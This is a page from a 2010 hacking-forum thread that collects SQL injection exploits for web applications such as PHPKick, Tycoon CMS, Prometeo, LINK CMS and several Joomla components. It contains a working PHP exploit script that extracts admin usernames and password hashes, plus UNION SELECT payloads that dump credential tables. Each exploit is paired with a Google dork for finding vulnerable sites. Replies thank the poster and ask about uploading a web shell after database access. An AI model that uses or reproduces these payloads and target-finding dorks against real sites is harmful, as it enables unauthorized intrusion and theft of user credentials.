:: vBspiders Professional Network :: - √مملكة ثغرات حقن قواعد البيانات√--Kingdom Of Sql Injection--

صفحة 2 من 2

عرض 40 مشاركات من هذا الموضوع لكل صفحة

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)

- SQL قواعد البيانات (http://www.vbspiders.com/vb/f133.html)

- - √مملكة ثغرات حقن قواعد البيانات√--Kingdom Of Sql Injection-- (http://www.vbspiders.com/vb/t34001.html)

Master vbspiders

08-09-2010 10:03 PM

PHPKick v0.8 statistics.php SQL Injection Exploit

كود PHP:

  
# Exploit Title: PHPKick v0.8 statistics.php SQL Injection

# Date: August 8th, 2010

# Time: 03:45am ;(

# Author: garwga

# Version: 0.8

# Google dork : "© 2004 PHPKick.de Version 0.8"

# Category:  webapps/0day

# Code: see below

  

<?php

    echo"\n\n";

    echo"|=================PHPKick v0.8 statistics.php SQL Injection==================|\n";

    echo"|                                                                            |\n";

    echo"|Syntax: php ".$_SERVER['argv'][0]." [host] [path]                                       |\n";

    echo"|                                                                            |\n";

    echo"|Example: php ".$_SERVER['argv'][0]." http://www.domain.com /path/                       |\n";

    echo"|                                                                            |\n";

  

    echo"|Notes:This exploit works regardless of the PHP security settings            |\n";

    echo"|      (magic_quotes, register_globals).This exploit is only for educational |\n";

    echo"|      use, use it on your own risk! Exploiting scripts without permission of|\n";

    echo"|      the owner of the webspace is illegal!                                 |\n";

    echo"|      I'm not responsible for any resulting damage                          |\n";

    echo"|                                                                            |\n";

    echo"|Google Dork: \"© 2004 PHPKick.de Version 0.8\"                                |\n";

    echo"|                                                                            |\n";

    echo"|Exploit found by garwga (ICQ#:453-144-667)                                  |\n";

    echo"|============================================================================|\n\n\n";

  

  

if($_SERVER['argv'][1] && $_SERVER['argv'][2]){

    $host=$_SERVER['argv'][1];

    $path=$_SERVER['argv'][2];

    $spos=strpos($host, "http://");

    if(!is_int($spos)&&($spos==0)){

       $host="http://$host";

      }

    if(!$host=="http://localhost"){

       $spos=strpos($host, "http://www.");

       if (!is_int($spos)&&($spos==0)){

          $host="http://www.$host";

          }

      }

    $exploit="statistics.php?action=overview&gameday=-32%20union%20select%201,2,3,4,0x2720756e696f6e2073656c65637420312c322c636f6e636174286e69636b2c273a272c70617373776f7274292c342c352c362c372066726f6d206b69636b5f757365722077686572652069643d2231222d2d2066,6,7,8--%20f";

    echo"exploiting...\n";

    $source=file_get_contents($host.$path.$exploit);

    $username=GetBetween($source," :<br>",":");

    echo "username: $username\n";

    $hash=GetBetween($source,"<br>$username:","</td>");

    echo"hash: $hash\n";

    }

else{

    echo"\n\n";

    echo"|=================PHPKick v0.8 statistics.php SQL Injection==================|\n";

    echo"|                                                                            |\n";

    echo"|Syntax: php ".$_SERVER['argv'][0]." [host] [path]                                       |\n";

    echo"|                                                                            |\n";

    echo"|Example: php ".$_SERVER['argv'][0]." http://www.domain.com /path/                       |\n";

    echo"|                                                                            |\n";

  

    echo"|Notes:This exploit works regardless of the PHP security settings            |\n";

    echo"|      (magic_quotes, register_globals).This exploit is only for educational |\n";

    echo"|      use, use it on your own risk! Exploiting scripts without permission of|\n";

    echo"|      the owner of the webspace is illegal!                                 |\n";

    echo"|      I'm not responsible for any resulting damage                          |\n";

    echo"|                                                                            |\n";

    echo"|Google Dork: \"© 2004 PHPKick.de Version 0.8\"                                |\n";

    echo"|                                                                            |\n";

    echo"|Exploit found by garwga (ICQ#:453-144-667)                                  |\n";

    echo"|============================================================================|\n";

}

function GetBetween($content,$start,$end){

    $r = explode($start, $content);

    if (isset($r[1])){

        $r = explode($end, $r[1]);

        return $r[0];

    }

    return '';

}

Master vbspiders

08-09-2010 10:05 PM

Tycoon CMS Record Script SQL Injection Vulnerability

كود PHP:

   % Tycoon(CMS) Record Script Sql vulnerability

 

-------------------------------------------------------------------------------

0                             | |              | |                      | |  TM

1   _______  _ __   ___ ______| |__   __ _  ___| | _____ _ __ _ __   ___| |_

0  |_  / _ \| '_ \ / _ \______| '_ \ / _` |/ __| |/ / _ \ '__| '_ \ / _ \ __|

1   / / (_) | | | |  __/      | | | | (_| | (__|   <  __/ | _| | | |  __/ |_

0  /___\___/|_| |_|\___|      |_| |_|\__,_|\___|_|\_\___|_|(_)_| |_|\___|\__|

1                         0xPrivate 0xSecurity 0xTeam

0       ++++++++++++++++++++++++++++++++++++++++++++++++++++

1                      A Placec Of 0days  

------------------------------------------------------------------------------

 

^Exploit Title  : Tycoon(CMS) Record Script Sql vulnerability

^Date       : 7/8/2010

^Vendor Site    : http://www.tycoon.co.kr

^MOD Version    : 1.0.9

^Author     : Silic0n (science_media017[At]yahoo.com)

^category:  : webapps/0day

^Dork       : inurl:index.php?mode=game_player

 

------------------------------------------------------------------------------

Special Thnanks To Jackh4x0r , Gaurav_raj420 , Mr 52 (7) , Dalsim , Zetra , haZl0oh , root4o ,

 Dark , XG3N , Belma(sweety), messsy , Thor ,abronsius ,Nova ,

 ConsoleFx , Exi , Beenu , R4cal , jaya ,entr0py,[]0iZy5 & All my friends .

 

My Frnd Site : www.igniteds.net , www.anti-intruders.org (Will Be Up Very Soon) , www.root-market.com ,www.Darkode.com ,r00tDefaced.com

 

----------------------------------->Exploit<----------------------------------

 

0x1: Goto http://{localhost}/record/index.php?mode=game_player&type=0&year=2010&game_id=-14 UNion Select 1,2,@@version

 

Version : (4.0.22-log)

 

------------------------------------------------------------------------------

Master vbspiders

08-09-2010 10:07 PM

Joomla Component com_neorecruit 1.4 SQL Injection Vulnerability

كود PHP:

   view source

print?

     )   )            )                     (   (         (   (    (       )     )

  ( /(( /( (       ( /(  (       (    (     )\ ))\ )      )\ ))\ ) )\ ) ( /(  ( /(

  )\())\()))\ )    )\()) )\      )\   )\   (()/(()/(  (  (()/(()/((()/( )\()) )\())

 ((_)((_)\(()/(   ((_)((((_)(  (((_)(((_)(  /(_))(_)) )\  /(_))(_))/(_))(_)\|((_)\

__ ((_)((_)/(_))___ ((_)\ _ )\ )\___)\ _ )\(_))(_))_ ((_)(_))(_)) (_))  _((_)_ ((_)

\ \ / / _ (_)) __\ \ / (_)_\(_)(/ __(_)_\(_) _ \|   \| __| _ \ |  |_ _|| \| | |/ /

 \ V / (_) || (_ |\ V / / _ \  | (__ / _ \ |   /| |) | _||   / |__ | | | .` | ' < 

  |_| \___/  \___| |_| /_/ \_\  \___/_/ \_\|_|_\|___/|___|_|_\____|___||_|\_|_|\_\

                                        .WEB.ID

-----------------------------------------------------------------------

 Joomla Component com_neorecruit 1.4 (id) SQL Injection Vulnerability

-----------------------------------------------------------------------

Author      : v3n0m

Site        : http://yogyacarderlink.web.id/

Date        : August, 07-2010

Location    : Jakarta, Indonesia

Time Zone   : GMT +7:00

----------------------------------------------------------------

 

Affected software description:

~~~~~~~~~~~~~~~~~~~~~~~~~~

 

Application : NeoRecruit

Version     : 1.4 Lower versions may also be affected

Vendor      : http://www.neojoomla.com/

Price       : 54,90 €

Google Dork : inurl:com_neorecruit

----------------------------------------------------------------

 

Xploit:

~~~~~~~

 

-9999+union+all+select+1,group_concat(username,char(58),password)v3n0m,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+jos_users--

 

Poc:

~~~~~~~

 

http://127.0.0.1/[path]/index.php?option=com_neorecruit&task=offer_view&id=[SQLi]

 

----------------------------------------------------------------

 

WWW.YOGYACARDERLINK.WEB.ID | v3n0m666[at]live[dot]com

 

---------------------------[EOF]--------------------------------

KALASH3R

08-10-2010 03:39 PM

يعطيك العافية

بارك الله فيك

Master vbspiders

08-11-2010 01:32 AM

[align=center]KALASH3R
لا اريد ردود حانبية
تحياتي[/align]

PrInCe Of PeRsIa

08-11-2010 01:57 AM

thanxxx so much mohammad
keep ur job like this

Master vbspiders

08-27-2010 02:32 PM

Prometeo v1.0.65 SQL Injection Vulnerability

كود PHP:

                         ****     **    ********   **********                     /**/**   /**   **//////   /////**///                      /**//**  /**  /**             /**                         /** //** /**  /*********      /**                         /**  //**/**  ////////**      /**                         /**   //****         /**      /**                         /**    //***   ********       /**                         //      ///   ////////        //

 

                          =================================                  

Prometeo (vers. 1.0.65)  -SQLi Vulnerability-                          =================================

 

-Vulnerability ID: LD3-Product: Prometeo-Vendor: Prometeo (http://www.infomedia2000.it/prometeo/)-Vulnerability Type: SQL Injection-Status: Unfixed-Risk level: High-Credit: Network Security (http://www.netw0rksecurity.net/)

 

-Vulnerability Details:User can execute arbitrary JavaScript code within the vulnerable application.An attacker can use browser to exploit this vulnerability.

 

-Google Dork: inurl:categoria.php?ID= comune

 

-Example:

http://server/categoria.php?ID=132%20and%201=2%20union%20select%201,concat(nome,0x3a,password),3,4,5,6,7,8,9,10,null,12,13,14,15,16,17%20from%20users--

 

# Netw0rkSecurity.net [2010-08-26]                 

 
Comments

Master vbspiders

08-27-2010 02:35 PM

Joomla Component (com_remository) SQL Injection Vulnerability

كود PHP:

   ############################## ALGERIAN HAX0RZ #############################..

# Exploit Title: [title]

# Date: 24/08/2010

# Author: TopSat13

# Software Link: http://remository.com/downloads/

# Version: 1

# Tested on: [win sp3 os]

# CVE : [if exists]

####

#              oooo[ Software Information ]oooo

# Author: TopSat13

#

# Email: TopSat13@live.fr

#

# Vendor : http://remository.com/

#

# title : Joomla Component (com_remository) SQL Injection Vulnerability

#

# Dork :"inurl:index.php?option=com_remository"

#

####           oooo[ vuln & exploit & Demo ]oooo

#

# vuln: site.com/index.php?option=com_remository&Itemid=[sql]

# or

# vuln: site.com/index.php?option=c&Itemid=183&func=selectcat&cat=[sql]

#

# exploit:

#

# 0nligne demo :

http://www.site.com/portail/index.php?option=com_remository&Itemid=183&func=selectcat&cat=3'

#

#

####          oooo[ Greeeeeeeeeeeeeeeeeeetz ]oooo

#

# to : ALLAH , All my freands , all musulmens hackerz

#

############################## ALGERIAN H4X0RZ

################################..

Master vbspiders

08-27-2010 02:37 PM

Joomla Component (com_zoomportfolio) SQL Injection Vulnerability

كود PHP:

   ---------------------------------------------------------------------------------

Joomla Component Zoom Portfolio (id) Remote Sql Injection

---------------------------------------------------------------------------------

 

Author      : Chip D3 Bi0s

Group       : LatinHackTeam

Email & msn : chipdebios@gmail.com

Date        : 23 August 2010

Critical Lvl    : Moderate

Impact      : Exposure of sensitive information

Where       : From Remote

---------------------------------------------------------------------------

 

Affected software description:

~~~~~~~~~~~~~~~~~~~~~~~~~~~

 

Application : Zoom Portfolio --Joomla Portfolio Component

version     : 1.5

Price       : $20.00

Developer   : EGBZOOM

License     : GPLv2 or later           type  : Commercial

Date Added  : 21 August 2010

Download    : http://www.egbzoom.com/joomla-portfolio-component.html

 

Description     :

 

Zoom Portfolio enables you to display your portfolio in a "directory listing-like

presentation" with minimum effort.The Component has features like add category

add images,settings,add portfolio .Zoom Portfolio includes automatic thumbnail creation,

captioning, searching and more.It also includes the ability to modify and delete any

of your existing pages.

The Zoom Portfolio is an amazing example of what can be done online with your online

presence. It is directed at artists of all walks of life, it is very easy to install

and customize, and it is just simply stunning.

 

-------------------------

 

How to exploit

 

http://127.0.0.1/path/index.php?option=com_zoomportfolio&view=portfolio&view=portfolio&id=[sql]

 

-------------------------

 

+++++++++++++++++++++++++++++++++++++++

[!] Produced in South America

+++++++++++++++++++++++++++++++++++++++

Master vbspiders

08-27-2010 02:39 PM

LINK CMS SQL Injection Vulnerability

كود PHP:

   # Exploit Title: LINK CMS.SQL Injection Vulnerability

# Date: 2010-08-23

# Author: hacker@sr.gov.yu

# Software Link:

http://www.link-softsolutions.com/SoftLink-Content-Management-System---CMS_20_1

# Version: n/a

 

 

####################################################################

.:. Author : hacker@sr.gov.yu

.:. Contact: hacker@evilzone.org, hacker@sr.gov.yu(MSN)

.:. Home : www.evilzone.org, www.pentesting-rs.org

.:. Script : LINK CMS

.:. Bug Type : Sql Injection

.:. Risk: High

.:. Tested on : Windows & Linux

 ####################################################################

 

===[ Exploit ]===

 

.:. It was found that LINK CMS does not validate properly the "IDStranicaPodaci"

parameter value.

 

http://server/navigacija.php?jezik=lat&IDMeniGlavni=6&IDMeniPodSekcija=45&IDMeniPodSekcija3=6&IDStranicaPodaci=63[SQLi]

 

===[ Example ]===

 

http://server/navigacija.php?jezik=lat&IDMeniGlavni=6&IDMeniPodSekcija=45&IDMeniPodSekcija3=6&IDStranicaPodaci=-63

UNION SELECT 1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,4--

 

 

===[ Solution ]===

 

.:. Input validation of "IDStranicaPodaci" parameter should be corrected.

 

 

Greetz to ALL EVILZONE.org && pentesting-rs.org members!!!

Pozdrav za sve iz Srbije!!! :-)))

MadaRaXP

08-28-2010 06:04 AM

perl langugue ?
its need Some Application Yo Run

winfil

12-01-2010 03:19 AM

thnk you so much homie at last i found smth'n more stable .i want to ask you if i can upload my shell when i enter the db & other question can i use ""havij whith those exploits

الساعة الآن 03:08 AM

صفحة 2 من 2

عرض 40 مشاركات من هذا الموضوع لكل صفحة

[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0